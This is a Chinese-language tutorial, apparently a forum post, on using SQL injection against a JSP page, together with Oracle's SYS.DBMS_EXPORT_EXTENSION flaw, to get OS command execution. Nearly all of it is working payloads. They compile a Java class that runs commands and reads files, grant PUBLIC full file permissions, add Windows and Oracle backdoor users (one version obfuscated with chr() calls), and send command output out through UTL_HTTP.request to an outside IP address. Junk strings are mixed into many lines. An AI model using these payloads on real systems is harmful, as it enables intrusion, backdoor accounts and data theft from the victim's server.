实例演示oracle注入获取cmdshell的全过程

admin

以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
$ m3 T: W& K' o
2 r) H/ ?2 o) ]  }* V' Q9 ^　　/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
" Q( L; P, ~5 F的形式即可。(用" 'a'|| "是为了让语句返回true值)
语句有点长，可能要用post提交。
以下是各个步骤：
1 o1 g- I# t# ?" n1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在oracle上创建Java包LinxUtil，里面两个函数，runCMD用于执行系统命令，readFile用于读取文件：
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. n3 M$ ^6 T, A1 C) Q% rcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
7 N# F: J, N1 v* G  dnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
- N6 O1 R+ A( }! p5 |" D)
) w$ x4 `* l3 c, t; Z------------------------
- |& W4 J5 g- j: g5 o9 w如果url有长度限制，可以把readFile()函数块去掉，即：
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
9 a, X3 }% i+ W; N  nnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
* `  N0 C8 b+ o6 h7 g6 G9 l}'''';END;'';END;--','SYS',0,'1',0) from dual
7 T6 H6 N: L6 _7 X( k)
同时把后面步骤 提到的 对readFile()的处理语句去掉。
, x) d" k9 s! t! E------------------------------
$ n  k# R' Y7 ~8 E7 j9 o- q& F2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
5 k" H, O' f! X+ W; X4 ~3 {, iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 O0 R) A- Q) B$ j+ Y$ ?  Ccreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
" k; R8 \* c' F$ C# x5 c+ l# lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' G2 M0 b9 P4 B6 X6 v! K% fcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
% @$ ^3 @  l- E" z" A3 T9 O4 Eselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
6 W5 ~8 V- L1 E! Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
and '1'<>'11'||(
- d5 O% `  W+ cselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
- C9 D# D8 ^1 t2 Eselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
8 P- `. b( \; z, p4 }( l)
6 z; l) R6 K7 l6.执行命令：
/xxx.jsp?id=1 and '1'<>(
) I& Y5 E; N) g% gselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
% |6 I  L6 q/ Q2 r7 p& V* V7 A
)
# U5 o- J( o) b+ W! L+ i/xxx.jsp?id=1 and '1'<>(
2 j% c8 E- r6 ?5 U4 }1 [0 Fselect  sys.LinxReadFile('c:/boot.ini') from dual
" U& k8 T0 n0 p& \
)
# U. p7 n8 N$ F& ]5 j7 n& D　　
) x) X  Y2 D" q; ~2 t注意sys.LinxReadFile()返回的是varchar类型，不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
$ R3 A8 Z- e+ e6 A# c或者UTL_HTTP.request(:
8 N: c7 E2 c. G+ O: Z& l$ q4 F/xxx.jsp?id=1 and '1'<>(
/ t7 F( ^9 F3 h4 F$ HSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
: \; z' ?+ w3 H8 i$ r; U+ b/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
注意：用UTL_HTTP.request时，要用 REPLACE() 把空格、换行符给替换掉，否则会无法提交http request。用utl_encode.base64_encode也可以。
! ^; B" K7 B) ]' H; Z--------------------
9 w3 B2 x" R2 S/ v! }. l6.内部变化
通过以下命令可以查看all_objects表达改变：
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
. Z+ @" I: f$ |' M, U; @" B7.删除我们创建的函数
; Y; t: P; {& D# Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
/ v+ B) p2 k7 S- q======================================================================
测试漏洞的另一方法：
) y" {* Q, z8 q创建oracle帐号：
3 A) ^1 s3 h6 X' W8 Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即：
# ?- Z9 f: P0 A1 X: }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
# Q! G) L: X& V; C* B确定漏洞存在：
2 v3 n9 O) \4 l$ |# c& u' P: u1<>(
  D5 x1 h' H/ b' f5 Cselect user_id from all_users where username='LINXSQL'
)
4 }. _! P* C) w给linxsql连接权限：
- z2 B; p6 g; S. m2 ]7 z1 V" Q. q2 kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' ~; r- T: y2 S# J1 e' cGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号：
3 M3 C1 H: g( z- P! vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 f8 W- w8 u9 l: v+ d9 edrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数Linx_query()，执行成功的话返回数值"1"，但权限是继承的，可能仅仅是public权限，作用似乎不大，真的要用到话可以考虑grant dba to 当前的User：
1.jsp?id=1 and '1'<>(
6 c+ f$ e3 W9 [. Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! ^( i; h. j, v# q6 ecreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
2 i; L  U; @5 A1 J5 f' t　)
$ L5 W. t  B- F4 D


6 K3 ~" z+ H' R: i